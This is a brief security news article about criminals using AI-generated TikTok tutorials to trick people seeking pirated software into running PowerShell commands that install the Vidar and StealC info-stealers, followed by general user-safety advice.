Hackers Use TikTok and AI to Spread Info-Stealing Malware

Cybercriminals are using TikTok malware as a way to make information-stealing malware. These malware are targeting users seeking pirated software on the Chinese platform.

These deceptive videos, masquerading as legitimate tutorials, instruct viewers to execute PowerShell commands under the guise of software activation. Instead, these commands install malware variants like Vidar and StealC, which harvest sensitive data including documents, cryptocurrency wallets, and login credentials.

AI-Generated Videos as a Malware Delivery Tool

The campaign utilizes AI to create convincing tutorial videos that guide users through fake software activation processes. By leveraging TikTok’s trusted environment, attackers increase the likelihood of users executing malicious commands, making this method particularly insidious.

TikTok Malware: Advanced Infection Techniques

Upon execution, the PowerShell scripts employ advanced obfuscation techniques, such as base64 encoding, to conceal malicious URLs. The malware disables Windows Defender monitoring for specific directories and establishes persistence by installing itself as a trusted Windows Update service, ensuring continued operation even after system reboots.

TikTok Malware Infrastructure and Evasion

Researchers have identified that the campaign’s infrastructure includes domains hosted on bulletproof hosting providers, allowing cybercriminals to operate with minimal oversight. This setup complicates takedown efforts and contributes to the campaign’s resilience.

User Vigilance Advised

Users are advised to exercise caution when encountering software tutorials on social media platforms. Executing unverified commands can lead to severe security breaches. It’s crucial to rely on official sources for software and updates to mitigate the risk of malware infections.

Info-stealing malware embedded in apps typically disguises itself as a legitimate or useful application. Once a user installs the app, the malware silently runs in the background, harvesting sensitive data like login credentials, browsing history, stored cookies, and even clipboard content. It often targets autofill data from browsers and saved passwords, then transmits this stolen information to a remote server controlled by the attacker. Some advanced variants can even evade antivirus detection by mimicking normal app behavior.